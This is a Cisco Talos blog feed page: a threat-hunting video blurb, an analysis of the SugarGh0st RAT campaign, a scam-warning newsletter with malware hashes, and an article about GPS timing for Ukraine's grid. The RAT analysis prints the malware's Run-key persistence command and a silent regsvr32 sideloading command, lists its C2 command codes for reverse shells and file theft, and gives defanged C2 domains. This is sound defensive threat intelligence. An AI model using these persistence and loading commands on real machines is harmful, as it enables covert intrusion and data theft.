Normal view

There are new articles available, click to refresh the page.
Before yesterdayCisco Talos

What is threat hunting?

28 November 2023 at 13:00
What is threat hunting?

Many organizations are curious about the idea of threat hunting, but what does this really entail?  

What should you be hunting for? And what do you need to put in place to threat hunt properly? 

Four experienced security professionals from across Cisco recently sat down to discuss the basics of threat hunting, and how to go about “searching for the unknown.” In this video, we cover: 

  • The core principles of threat hunting. 
  • What are attackers looking for? And therefore, what should defenders be putting in place? 
  • Stories and experiences of threat hunting. 
  • How to approach failure.  

Talos Incident Response can help organizations review specific areas of your network and its systems for indicators of potential compromise. Threat hunting is hypothesis-driven and backed by the most current threat intelligence available from Talos. 

If you are interested in how Talos Incident Response can help you with your threat hunting goals, or even help you plan a compromise assessment, take a look at the various services our team can help you with. 

New SugarGh0st RAT targets Uzbekistan government and South Korea

30 November 2023 at 13:00
  • Cisco Talos recently discovered a malicious campaign that likely started as early as August 2023, delivering a new remote access trojan (RAT) we dubbed “SugarGh0st.” 
  • We found evidence suggesting the threat actor is targeting the Uzbekistan Ministry of Foreign Affairs and users in South Korea. 
  • We assess with high confidence that the SugarGh0st RAT is a new customized variant of Gh0st RAT, an infamous trojan that’s been active for more than a decade, with customized commands to facilitate the remote administration tasks as directed by the C2 and modified communication protocol based on the similarity of the command structure and the strings used in the code.
  • We observed two infection chains leveraging Windows Shortcut embedded with malicious JavaScript to deliver the components to drop and launch the SugarGh0st payload.
  • In one infection chain, the actor leverages the DynamixWrapperX tool to enable Windows API function calls in malicious JavaScript for running the shellcode.
  • Talos assesses with low confidence that a Chinese-speaking threat actor is operating this campaign based on the artifacts we found in the attack samples.

Suspected Chinese Actor targeting Uzbekistan and South Korea

New SugarGh0st RAT targets Uzbekistan government and South Korea

Talos discovered four samples deployed in this campaign that are likely targeting users in Uzbekistan and South Korea based on the language of the decoy documents, the lure content, and distribution indicators Talos found in the wild. 

One of the samples is sent to users in the Ministry of Foreign Affairs of Uzbekistan. The sample is an archive embedded with a Windows ShortCut LNK file which, upon opening, drops the decoy document “Investment project details.docx'' with Uzbek content about a presidential decree in Uzbekistan focused on enhancing state administration in technical regulation. The lure content of the decoy document was published in multiple Uzbekistan sources in 2021. The initial vector of the campaign is likely a phishing email with an attached malicious RAR archive file sent to an employee of the Ministry of Foreign Affairs.  

New SugarGh0st RAT targets Uzbekistan government and South Korea
Decoy document in Uzbek language.

Besides Uzbekistan, we also observed indications of targets in South Korea. We found three other decoy documents written in Korean dropped by the malicious JavaScript file embedded in the Windows Shortcut, seemingly distributed in South Korea. The decoy document named “Account.pdf” was forged as a Microsoft account security notification for confirming an account registration with a generated password. Another decoy named “MakerDAO MKR approaches highest since August.docx'' uses the copied content from 코인데스크코리아 (CoinDesk Korea, a Korean news outlet that covers the blockchain). The third decoy document, named “Equipment_Repair_Guide.docx,” has the lure information with instructions for computer maintenance in an organization. To reinforce our assessment of South Korean targets, we also observed C2 domain requests from IPs originating from South Korea. 

New SugarGh0st RAT targets Uzbekistan government and South Korea

New SugarGh0st RAT targets Uzbekistan government and South Korea

New SugarGh0st RAT targets Uzbekistan government and South Korea

The decoy documents found in the samples collected by Talos.

During our analysis, we observed a couple of artifacts that suggested the actor might be Chinese-speaking. Two of the decoy files we found have the “last modified by” names shown as “浅唱丶低吟” (Sing lightly, croon) and “琴玖辞” (seems to be the name of a Chinese novel author), which are both Simplified Chinese. 

New SugarGh0st RAT targets Uzbekistan government and South Korea

New SugarGh0st RAT targets Uzbekistan government and South Korea

The author and last editor’s information on decoy documents.

Besides the decoy document metadata, the actor prefers using SugarGh0st, a Gh0st RAT variant. The Gh0st RAT malware is a mainstay in the Chinese threat actors’ arsenal and has been active since at least 2008. Chinese actors also have a history of targeting Uzbekistan. The targeting of the Uzbekistan Ministry of Foreign Affairs also aligns with the scope of Chinese intelligence activity abroad. 

SugarGh0st is a new Gh0st RAT variant

Talos discovered a RAT that we call SugarGh0st delivered as a payload in this campaign. Talos assesses with high confidence that SugarGh0st is a customized variant of the Gh0st RAT. Gh0st RAT was developed by a Chinese group called 红狼小组 (C.Rufus Security Team), and its source code was publicly released in 2008. The public release of the source code has made it easy for threat actors to get access to it and tailor it to fulfill their malicious intentions. There are several variants of Gh0st RAT in the threat landscape, and it remains a preferred tool for many Chinese-speaking actors, allowing them to conduct surveillance and espionage attacks.

Compared with the original Gh0st malware, SugarGh0st is equipped with some customized features in its reconnaissance capability in looking for specific Open Database Connectivity (ODBC) registry keys, loading library files with specific file extensions and function name, customized commands to facilitate the remote administration tasks directed by the C2, and to evade earlier detections. The C2 communication protocol is also modified. The first eight bytes of the network packet header are reserved as magic bytes versus the first five in the earlier Gh0st RAT variants. The remaining features, including taking full remote control of the infected machine, providing real-time and offline keylogging, hooks to the webcam of an infected machine, and downloading and running other arbitrary binaries on the infected host are aligned with the features of earlier Gh0st RAT variants. 

A multi-stage infection chain 

Talos discovered two different infection chains employed by the threat actor to target the victims in this campaign. One of the infection chains decrypts and executes the SugarGh0st RAT payload, the customized variant of the Gh0st RAT. Another infection chain leverages the DynamicWrapperX loader to inject and run the shellcode that decrypts and executes SugarGh0st. 

Infection Chain No. 1

The first infection chain starts with a malicious RAR file containing a Windows Shortcut file with a double extension. When a victim opens the shortcut file, it runs a command to drop and execute an embedded JavaScript file. The JavaScript eventually drops a decoy, an encrypted SugarGh0st payload, DLL loader and batch script. Then, the JavaScript executes the batch script to run the dropped DLL loader by sideloading it with a copied rundll32. The DLL loader will decrypt the encrypted SugarGh0st payload in memory and run it reflectively. 

New SugarGh0st RAT targets Uzbekistan government and South Korea

Shortcut file embedded with malicious JavaScript dropper

The Windows shortcut file discovered in this attack is embedded with JavaScript and has command line arguments to drop and execute it. Upon the victim opening the LNK file, the command line argument of the LNK file runs to locate and load the JavaScript with the string start of “var onm=” which is the beginning of the JavaScript dropper and drops the JavaScript into the %temp% location. After that, the dropped JavaScript is executed using the living-off-the-land binary (LoLBin) cscript. 

New SugarGh0st RAT targets Uzbekistan government and South Korea
Sample of malicious LNK file.

JavaScript dropper 

The JavaScript dropper is a heavily obfuscated script embedded with base64 encoded data of the other components of the attack. The JavaScript decodes and drops the embedded files into the %TEMP% folder, including a batch script, a customized DLL loader, an encrypted SugarGh0st payload, and a decoy document. It first opens the decoy document to masquerade as legitimate action, then copies the legitimate rundll32 executable from the “Windows\SysWow64” folder into the %TEMP% folder. Finally, it executes the batch script loader from the %TEMP% location and runs the customized DLL loader. The JavaScript deleted itself from the file system afterward. 

New SugarGh0st RAT targets Uzbekistan government and South Korea
The JavaScript dropper.

Batch script loader

The batch script, in this instance, is named “ctfmon.bat” and has the commands to run the dropped customized DLL loader. When executed, it sideloads the DLL loader with rundll32.exe and executes the function which is DllUnregisterServer, typically used by COM (Component Object Model) DLLs.

New SugarGh0st RAT targets Uzbekistan government and South Korea
The batch script loader.

DLL Loader decrypts and reflectively loads the SugarGh0st payload

The customized DLL loader named “MSADOCG.DLL” (name of the DLL associated with Microsoft's ActiveX Data Objects (ADO) technology) is a 32-bit DLL written in C++ and implemented as a COM object component. The loader includes packed code that is unpacked with custom unpacking code. When the DLL is run, it unpacks the code to read the dropped encrypted SugarGh0st payload file named “DPLAY.LIB '' from the %TEMP% location, decrypts it and runs it in the memory. 

New SugarGh0st RAT targets Uzbekistan government and South Korea
Stub code to unpack code.
New SugarGh0st RAT targets Uzbekistan government and South Korea
Function to load the encrypted payload.

Infection chain No. 2

Similar to the first infection chain, this attack also starts with a RAR archive file containing a malicious Windows Shortcut file forged as the decoy document. The Windows shortcut file, by executing the embedded commands, drops the JavaScript dropper file into the %TEMP% location and executes it with cscript. The JavaScript in this attack drops a decoy document, a legitimate DynamicWrapperX DLL, and the encrypted SugarGh0st. The JavaScript uses the legitimate DLL to enable running the embedded shellcode for running the SugarGh0st payload. 

New SugarGh0st RAT targets Uzbekistan government and South Korea

JavaScript leverages DynamicWrapperX to run shellcode that launches SugarGh0st

The JavaScript used in this infection chain is also heavily obfuscated and is embedded with base64-encoded data of other components of the attack, including a shellcode. When the JavaScript is executed, it drops an encrypted SugarGh0st, a DLL called “libeay32.dll” and the decoy document. The JavaScript opens the decoy document and copies Wscript.exe to the %TEMP% folder as dllhost.exe. It runs the dropped JavaScript again using the dllhost.exe and creates a registry subkey called “CTFMON.exe” in the Run registry key to establish persistence. 

Registry Key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Subkey

CTFMON.exe

Value

“cmd /c start C:\Users\user\AppData\Local\Temp\dllhost.exe C:\Users\user\AppData\Local\Temp\~204158968.js”

The file “libeay32.dll” is a tool called DynamicWrapperX (originally named “dynwrapx.dll”) developed by Yuri Popov. This tool is an ActiveX component that enables Windows API function calls in scripts (JScript, VBScript, etc.). The attacker can use this to run shellcode via the JavaScript dropper. But, they must first run regsvr.exe to install the component. 

C:\Windows\system32\regsvr32 /i /s C:\Users\ADMINI~1\AppData\Local\Temp\libeay32.dll

The DynamicWrapperX DLL registers its member functions in the victim’s machine by creating a registry subkey CLSID with the value “89565275-A714-4a43-912E-978B935EDCCC” in Software\Classes\DynamicWrapperX registry key. The JavaScript containing the ActiveX components executes the embedded shellcode using the DynamixWrapperX DLL. 

The shellcode has the API hashes and instructions to load and map to the functions necessary for process injection from Kernel32.dll. It also loads two other DLLs, User32.dll and shlwapi.dll. Then, it loads the encrypted SugarGh0st “libeay32.lib” from the %TEMP% location, decrypts it, and reflectively loads it into the memory space allocated in the dllhost.exe process. 

New SugarGh0st RAT targets Uzbekistan government and South Korea
Shellcode that loads and decrypts the encrypted SugarGh0st. 

Analysis of SugarGh0st   

The SugarGh0st sample analyzed by Cisco Talos is a 32-bit dynamic link library in C++ compiled on Aug. 23, 2023. During its initial execution, SugarGh0st creates a mutex on the victim’s machine using the hard-coded C2 domain as an infection marker and starts the keylogging function. The keylogger module creates a folder “WinRAR'' in the location %Program Files% and writes the keylogger file “WinLog.txt.” 

New SugarGh0st RAT targets Uzbekistan government and South Korea
The Keylogging function of SugarGh0st.

SugarGh0st uses “WSAStartup” functions, a hardcoded C2 domain and port to establish the connection to the C2 server. Talos discovered two C2 domains, login[.]drive-google-com[.]tk and account[.]drive-google-com[.]tk, used by the threat actor in this campaign.

New SugarGh0st RAT targets Uzbekistan government and South Korea
The C2 communication function of SugarGh0st.

After launching, SugarGh0st attempts to establish the connection to C2 every 10 seconds. If successful, the first outgoing packet always consists of the same eight bytes “0x000011A40100” as a heartbeat. After the heartbeat is successfully sent, SugarGh0st sends the buffer data, which includes the following:

  • Computer name
  • Operating system version 
  • Root and other drive information of victim machine
  • Registry key “HKEY_LOCAL_MACHINE\Software\ODBC\H” if exist
  • Campaign codes 1 (Month and Year) and code 2 (in our samples are “default”)
  • Windows version number
  • Root drive’s volume serial number

A sample packet that was sent by SugarGh0st to C2.

SugarGh0st is a fully functional backdoor that can execute most remote control functionalities. It can launch the reverse shell and run the arbitrary commands sent from C2 as strings using the command shell.

New SugarGh0st RAT targets Uzbekistan government and South Korea
The Reverse shell function.

SugarGh0st can collect the victim’s machine hostname, filesystem, logical drive and operating system information. It can access the running process information of the victim’s machine and control the environment by accessing the process information and terminating the process as directed by the C2 server. 

It can also manage the machine’s service manager by accessing the configuration files of the running services and can start, terminate or delete the services.

New SugarGh0st RAT targets Uzbekistan government and South Korea
Function to operate services.

SugarGh0st can take screenshots of the victim machine’s current desktop and switch to multiple windows. It can access the victim’s machine camera to capture the screen and compress the captured data before sending it to the C2 server. SugarGh0st can perform various file operations, including searching, copying, moving and deleting the files on the victim’s machine.

It also clears the machine’s Application, Security and System event logs to hide the malicious operations logged to evade detection. 

New SugarGh0st RAT targets Uzbekistan government and South Korea
Function to clean event logs.

SugarGh0st performs the remote control functionalities, including those discussed earlier, as directed by the C2 server with the four-byte hex commands and accompanying data. 

Command

Action

0x20000001

Adjust process privilege to “SeShutdownPrivilege” and force shut down the host.

0x20000002

Adjust process privilege to “SeShutdownPrivilege” and force reboot the host.

0x20000003

Adjust process privilege to “SeShutdownPrivilege” and force terminate the processes.

0x20000004

Clear event log

0x20000005

Create register key HKEY_LOCAL_MACHINE\Software\ODBC\H

0x20000011

Press a key in the default window 

0x20000012

Release a key in the default window 

0x20000013

Set mouse cursor position

0x20000014

Click mouse left button

0x20000015

Release mouse left button

0x20000016

Double click the mouse left button

0x20000017

Click mouse right button

0x20000018

Release mouse right button

0x20000019

Double click the mouse left button

0x21000002

Get the logical drive information of the victim's machine. 


0x21000003

Search files on the victims machine filesystem

0x21000004

Delete files on the victim's machine file system

0x21000005

Moves files to the %TEMP% location 

0x21000006

Runs arbitrary shell commands

0x21000007

Copies files on the victim machine 

0x21000008

Move files on the victim's machine

0x21000009

Sends files to the C2 server 

0x2100000A

Sends the data to the windows socket

0x2100000B

Receives files from the C2 server

0x22000001

Sends the screenshot to the C2 server

0x24000001

Read file %ProgramFiles%/WinRAR/~temp.dat (which is encoded with XOR 0x62)

0x24000002

Delete file %ProgramFiles%/WinRAR/~temp.dat

0x23000000

Provides the reverse shell access to the C2 server 

0x25000000

Gets the process information and terminates the process 

0x25000001

Enumerate process information

0x25000002

Terminate Process

0x25000003

Access the victims machine service manager 

0x25000004

Access the configuration files of the running services

0x25000005

Starting service

0x25000006

Terminating and deleting the services. 

0x25000010

Performs the Windows operations

0x25000011

Get window list

0x25000012

Get message from Window

0x28000000

Capture window and perform a series of Window operations based on the command with SendMessage API.

0x28000002

Find a . OLE file under “%PROGRAMFILES%\\Common Files\\DESIGNER'' and launch

Coverage

New SugarGh0st RAT targets Uzbekistan government and South Korea

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat is 62647.

ClamAV detections available for this threat:

Win.Trojan.SugarGh0stRAT-10014937-0

Win.Tool.DynamicWrapperX-10014938-0

Txt.Loader.SugarGh0st_Bat-10014939-0

Win.Trojan.SugarGh0stRAT-10014940-0

Lnk.Dropper.SugarGh0stRAT-10014941-0

Js.Trojan.SugarGh0stRAT-10014942-1

Win.Loader.Ramnit-10014943-1

Win.Backdoor.SugarGh0stRAT-10014944-0

Orbital Queries

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries related to this threat, please follow the links:

Indicators of Compromise

Indicators of Compromise associated with this threat can be found here.

$19 Stanely cups, fake Amazon Prime memberships all part of holiday shopping scams circulating

30 November 2023 at 19:00
$19 Stanely cups, fake Amazon Prime memberships all part of holiday shopping scams circulating

I know I’m a little late to the party to hit the prime SEO for Black Friday, Cyber Monday and holiday shopping. But if I know the readers of this newsletter, everyone is far from done with their holiday shopping already after a few days. 

I also know I’m far from the only person to warn consumers about scams during this season, so I’m trying to split the difference and highlight a few specific scams and spam campaigns that are already circulating in the wild, some of which popped up right on Black Friday, so you don’t get caught in the remaining days leading up to the winter holidays. 

Fake Facebook ads seem to be the flavor of the month for scammers. This is completely anecdotal, but my mom almost got “got” with a fake Facebook post in a group she belongs to claiming to have some great deals on Nintendo Switch games on Amazon that were not actually real (thankfully she hadn’t clicked the link before she asked me if “Mario Odyssey” was a good deal at $15).  

Still, several other reports have shown that scammers are using Facebook ads to advertise a deal for a $19 Stanley cup — these are the water bottles all the influencers are using nowadays and, even when they are on sale, don’t go for any less than about $35. In this case, it looks like the actors are just looking to take your money or credit card information with a fake ordering process and no plans to send you anything. 

Adversaries have also set up fake Facebook pages and web pages disguising themselves as the retailer Big Lots. These fake ads and posts offer vague deals and sales on various products but instead point to typo-squatted Big Lots websites (or URLs that vaguely seem like they could be connected to Big Lots).  

Scammers are also sending mass emails to subscribers of various streaming services like Amazon Prime, Paramount+ and Peacock claiming that their subscription has lapsed, but they can resubscribe for a deeply discounted price, or even free, as part of a Black Friday special.  

Amazon also issued a warning recently that attackers have been sending emails with malicious attachments asking for users' personal information in exchange for having their “accounts” unlocked. 

This is just a sampling of the likely hundreds of different scams and spam campaigns attackers are deploying right now, so in general, when shopping online, here are a few tips: 

  • Only download apps from trusted and official app stores like the Google Play store and iOS App Store. 
  • Look out for apps that ask for suspicious permissions, such as access to your text messages, contacts, stored passwords and administrative features. 
  • Some malicious apps will try to masquerade as a legitimate version of the one you could be searching for. Signs of these apps include poor spelling and grammar in app descriptions and interfaces, lack of high-quality performance and a developer contact that uses a free email service (such as @gmail.com). 
  • Avoid clicking on unsolicited emails. Make sure you purposefully subscribed to any marketing emails you receive from retailers before opening it. 
  • Use an ad blocker locally on your browser. These will often block any malvertising campaigns that aim to capitalize on shoppers looking for deals. 
  • Try to use payment services such as Google Pay, Samsung Pay and Apple Pay. These services use tokenization instead of the “Primary Account Number” (your credit card number), making your transaction more secure. 
  • Use unique, complex passwords, per site. Attackers commonly reuse passwords to compromise multiple accounts with the same username. Use a password locker if you have a hard time creating and remembering secure passwords. 
  • Manually type in URLs to sites you want to visit rather than clicking on links. 
  • Use multi-factor authentication, such as Cisco Duo, to log into your email account to avoid unauthorized access. 

Next week, Talos will have a holiday special of our own! On Dec. 5, we’ll be launching our second-ever Year in Review report, complete with all new data and insights about the attacks and malware we’ve seen in 2023. Stay tuned to our social media channels or blog for that release.  

The one big thing 

Cisco Talos recently discovered a malicious campaign that likely started as early as August 2023, delivering a new remote access trojan (RAT) we dubbed “SugarGh0st.” We assess with high confidence that the SugarGh0st RAT is a new customized variant of Gh0st RAT, an infamous trojan that’s been active for more than a decade, with customized commands to facilitate the remote administration tasks as directed by the C2 and modified communication protocol based on the similarity of the command structure and the strings used in the code. 

Why do I care? 

If infected, SugarGh0st serves as a fully functional backdoor for the adversary that can execute most remote-control functionalities. It can launch the reverse shell and run the arbitrary commands sent from C2 as strings using the command shell. SugarGh0st can collect the victim’s machine hostname, filesystem, logical drive, and operating system information. It can access the running process information of the victim’s machine and control the environment by accessing the process information and terminating the process as directed by the C2 server. It can also manage the machine’s service manager by accessing the configuration files of the running services and can start, terminate or delete the services. 

So now what? 

Since this seems to be an offshoot of GhostRAT, we certainly can’t rule out any other variants that may be floating out there. Talos also has new ClamAV signatures, Snort rules and other Cisco Secure protection to specifically detect and stop SugarGh0st.  

Top security headlines of the week 

Cisco Talos and other teams across Cisco recently worked with multiple government partners to help protect the Ukrainian power grid and ensure it runs appropriately. The effort, spearheaded by Talos’ Joe Marshall, involved creating bespoke hardware for Ukraine’s energy supplier, Ukrenergo, to operate in place of traditional GPS devices that the Ukrainian power grid relies on to keep running on time. GPS satellites and Ukrainian substations have constantly been the target of kinetic and cyber threats during Russia’s invasion of Ukraine. Officials from multiple U.S. government agencies assisted in the project.  The Pentagon set up flights to physically deliver the manipulated switches, the Department of Energy helped coordinate the equipment’s delivery, and, as Ukrenergo told CNN, the Department of Commerce was a part of critical meetings that first outlined this project. Taras Vasyliv, who oversees power dispatching for Ukrenergo, told CNN that the custom-built switches were the equivalent of a “flashlight” for a surgeon who is trying to operate in the dark. (CNN, Business Insider

Leaked government documents show that some local, federal and state law enforcement officers have been able to view the phone records of millions of Americans, even those who have not been accused or suspected of a crime. The little-known Pentagon program was partially uncovered because of a letter sent from U.S. Sen. Ron Wyden of Oregon to U.S. Attorney General Merrick Garland, in Wyden’s office requested more information on the project and encouraged the federal government to publicly disclose this knowledge. The letter states the White House pays wireless company AT&T to give all federal, state, local, and Tribal law enforcement agencies “the ability to request often-warrantless searches.” Known as the “Hemisphere Project,” this program has apparently been around since 2007 and reported on by the New York Times in 2013 but has largely gone unnoticed since. Wyden is attempting to challenge the legality of the Hemisphere Project. (Wired

Security researchers have found a way to bypass the Microsoft Hello login authentication system used in many fingerprint readers and face ID scanners on devices from Dell, Lenovo and Microsoft. Researchers hired by Microsoft to test the security of the readers have since informed the company of these vulnerabilities. The attack the researchers outlined could provide access to a stolen laptop or carry out what's called an “evil maid” attack on an unattended device. Microsoft introduced Hello with its Windows 10 operating system, and since then has included fingerprint scanners on all its devices (though in some cases, Microsoft’s own hardware like the Surface tablet did not use Hello). Though the manufacturers are now aware of these vulnerabilities, the variety of attacks means it can be difficult to patch for these issues. However, all the attacks ultimately required physical access to a device. (Ars Technica, The Verge

Can’t get enough Talos? 

Upcoming events where you can find Talos 

"Power of the Platform” by Cisco (Dec. 5 & 7) 

Virtual (Please note: This presentation will only be given in German) 

The annual IT event at the end of the year where Cisco experts, including Gergana Karadzhova-Dangela from Cisco Talos Incident Response, discuss the future-oriented topics in the implementation of digitalization together with you.  

What Threats Kept Us Up in 2023: A Year in Review and a Look Ahead (Dec. 13, 11 a.m. PT) 

Virtual 

Each year brings new threats that take advantage of increasingly complex security environments. Whether it’s Volt Typhoon targeting critical infrastructure organizations across the United States or ALPHV launching an attack against casino giant MGM, threat actors are becoming bolder and more evasive. That’s why it’s never been more important to leverage broad telemetry sources, deep network insights and threat intelligence to respond effectively and recover faster from sophisticated attacks. Join Amy Henderson, Director of Strategic Planning and Communications at Cisco Talos and Briana Farro, Director of XDR Product Management at Cisco, as they discuss some of the top threat trends and threats we have seen this past year and how to leverage security technology like XDR and network insights to fight against them. 

NIS2 Directive: Why Organizations Must Act Now to Ensure Compliance and Security (Jan. 11, 2024, 10 a.m. GMT) 

Virtual 

The NIS2 Directive is a crucial step toward securing Europe’s critical infrastructure and essential services in an increasingly interconnected world. Organizations must act now to prepare for the new requirements, safeguard their operations, and maintain a robust cybersecurity posture. Gergana Karadzhova-Dangela from Cisco Talos Incident Response and other Cisco experts will talk about how organizations can best prepare for the coming regulations.  

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7  
MD5: 0e4c49327e3be816022a233f844a5731  
Typical Filename: aact.exe  
Claimed Product: AAct x86  
Detection Name: PUA.Win.Tool.Kmsauto::in03.talos 

SHA 256: 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e 
MD5: 040cd888e971f2872d6d5dafd52e6194 
Typical Filename: streamer.exe 
Claimed Product: Ultra Virus Killer 
Detection Name: PUA.Win.Virus.Ultra::95.sbx.tg 

SHA 256: abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6 
MD5: 22ae85259273bc4ea419584293eda886 
Typical Filename: KMSAuto++ x64.exe 
Claimed Product: KMSAuto++ 
Detection Name: Hacktool:PUP.26ld.in14.Talos 

SHA 256: 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e 
MD5: 040cd888e971f2872d6d5dafd52e6194 
Typical Filename: tmp000c3787 
Claimed Product: Ultra Virus Killer 
Detection Name: PUA.Win.Virus.Ultra::95.sbx.tg 

SHA 256: 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa 
MD5: 9403425a34e0c78a919681a09e5c16da 
Typical Filename: vincpsarzh.exe 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::tpd 

Project PowerUp – Helping to keep the lights on in Ukraine in the face of electronic warfare

4 December 2023 at 13:01
  • As Russia’s invasion of Ukraine entered its first winter in late 2022, nearly half of Ukraine’s energy infrastructure had been destroyed, leaving millions without power. The resulting energy deficit has exacerbated something that hasn’t had much media attention: The effects of electronic GPS jammers affecting vital electrical equipment.
  • Ukraine’s high-voltage electricity substations rely on GPS for time synchronization. So, when the GPS is jammed, the stations can’t accurately report to power dispatchers on the state of the grid.
  • This complicates efforts to balance loads between different parts of the system, which is necessary to avoid outages and failure — especially during peak demand and surge times. Until recently, there was no solution to this problem.
  • Cisco Talos worked alongside several other teams at Cisco, along with government partners in the U.S and Ukraine, to find a technological solution.
Project PowerUp – Helping to keep the lights on in Ukraine in the face of electronic warfare

Since the start of the Russian invasion of Ukraine, Talos has been unwavering in our commitment to protect Ukrainian critical infrastructure from cyberattacks. 

In this blog post, you won’t find any mention of malware, DDoS, or espionage campaigns. In fact, it’s not about cybersecurity at all. This is a story about electronic warfare and GPS. It’s about how one chance conversation over dinner led me on a path through Cisco to find a solution to some very tough questions, and difficult answers.  

So, who am I? My name is Joe Marshall. I work at Cisco Talos as a cyber threat researcher and security strategist. My expertise is in industrial control systems and electric grids. My colleagues and friends at Talos are on the front lines of keeping the internet safe — and from more than just cyber threats, as you’ll read.

Project PowerUp is the story of how Cisco Talos worked with a multi-national, multi-company coalition of volunteers and experts to inject a measure of stability in Ukraine’s power transmission grid.

Our ultimate goal was to “keep the lights on” in Ukraine, and help make the lives of Ukrainians who are living in an active war zone, just that little bit easier.

Chapter 1: The energy deficit

As Russia’s invasion of Ukraine entered its first winter in late 2022, Russia stepped up attacks on Ukraine’s energy sector to deprive citizens of electricity and heat during the coldest part of the year. Nearly half of Ukraine’s energy infrastructure had been destroyed, leaving millions without power. The resultant energy deficit was exacerbated by another wartime challenge that, for some reason, hasn’t had much media attention: the effects of deliberate GPS disruptions affecting vital electrical equipment.

For the past year, there have been numerous reports of Russia interfering with GPS signals, especially near and within its own borders. Use of electronic jamming devices has been linked to attempts to disrupt GPS guided munitions, protect troops, and advance the tactical and strategic goals of armed conflict. 

While electronic interference can affect the battlefield, it is also having a secondary, unintended effect on Ukraine’s energy sector. Many of Ukraine’s high-voltage electrical substations — which play a vital role in the country’s domestic transmission of power — make extensive use of the availability of precise GPS timing information to help operators anticipate, react and diagnose a complex high-voltage electric grid. This is a complicated task during normal times, much less during a war.

When GPS signals are widely disrupted, substations cannot synchronize their time reporting accurately because they cannot assign accurate timestamps. Without good synchronized data, efforts to manage loads between different parts of the system can be affected, and this management avoids outages and failure, especially during peak demand and surge times. This disruption can be widespread, causing wide areas to lose GPS service for long periods of time. 

Until now, Ukraine has not had a viable solution to this issue for electric power systems.

Chapter 2: A chance meeting

I first learned about this situation when I was in delivering a cyber security presentation in February of 2023.  The audience just so happened to include a delegation from Ukrenergo, the electricity transmission system operator in Ukraine and is solely responsible for operating the country’s high-voltage electrical lines. Talos has been working with Ukrenergo for many years. 

The night before the presentation, colleagues from Ukrenergo invited me to dinner. When we sat down, I couldn’t help but persist with a barrage of questions: “How are you? Are you safe? What’s going on?” 

They started to tell me the true extent of what had been happening. This was one year since the start of the invasion. It was still deeply cold in Ukraine, and Russia had continually bombarded critical infrastructure for the entire winter. By March, there would be word that Russia’s campaign was beginning to tail off, but we didn’t know that at the time.

Ukrenergo started to list problem after problem, specifically with regards to the power grids. The obvious problems we all knew of course – kinetic strikes against substations were knocking out the power. Energy transformers were being destroyed, and replacements were scarce. One problem mentioned was rather casual, sandwiched in-between others, “We can’t get reliable timing due to electronic GPS jamming.” 

As I mentioned earlier, Ukraine’s high-voltage electricity substations rely on GPS for time synchronization. So, when the GPS is deliberately disrupted, the stations can’t accurately report to power dispatchers on the state of the grid. 

My ill-informed, rather bombastic response to this was, “Just buy some atomic clocks! You know…the type used by NASA.” Only after the words came out of my mouth did I remember that atomic clocks might not be a financially feasible option for this war-torn country. In fact, one member of the Ukrenergo delegation wryly retorted (I'm paraphrasing here), “Sure. Show me the aisle of the grocery store where atomic clocks can be found cheaply.” 

For the rest of the night, we talked about the GPS issues, the war, and Ukraine’s response to being attacked. Despite the sober undertones, the dinner company was superb, and the fellowship top-notch. The GPS timing issue, however, wouldn’t leave my head. I tried to look at it from all different angles. 

When we said goodbye that night, I silently vowed I was going to do everything in my power to help. But at the time, I had no answers. 

💡
High-voltage substations are critical components in the power system where power can be pooled from generating resources, transformed to different voltage levels, and delivered to the load points. Substations are interconnected with each other, creating a network that increases the reliability of the power supply system by providing alternate paths for power flow. This ensures that power delivery is maintained at all times and there are no outages.
Project PowerUp – Helping to keep the lights on in Ukraine in the face of electronic warfare
Substation in Ukraine damaged by Russian airstrikes

Chapter 3: The time paradox

While thinking about viable solutions, I was guided by an important principle: Whatever we do, speed is key. As I was wracking my brain, Ukraine was at war and suffering. However, I soon began to learn that it wasn’t as simple as that, due to the sheer complexities of what the country was up against. 

To truly understand the layers of solving this issue, I need to talk about why GPS clock timing is so important to electric grids. Most people are familiar with GPS because we rely on it for navigation, but it has also become the dominant system for the distribution of time and frequency signals globally. The U.S. controls and operates GPS satellites that orbit the earth twice a day which broadcast signals anyone in the world can use.

These satellites send very precise time data to GPS receivers on the ground that receive and decode the signals, effectively synchronizing each receiver to the same clock. This enables users to determine the time within 100 nanoseconds without the cost of owning and operating expensive and complex equipment, such as atomic clocks. 

Because GPS time is so accurate, GPS-disciplined clocks are commonly used in industrial systems, like Ukraine’s power grid, that require extremely precise time across a vast geographic area. 

Most devices that rely on time to calculate measurements have frequency references. The frequency reference is provided by an internal crystal oscillator within the device, and that crystal tells the device how fast time is going. However, these times are never perfectly accurate due to manufacturing variations and other variables in the crystal oscillators, causing time to advance at slightly different rates across various devices. This is why the clock on your laptop might be a few seconds or minutes ahead or behind the clock in your car. 

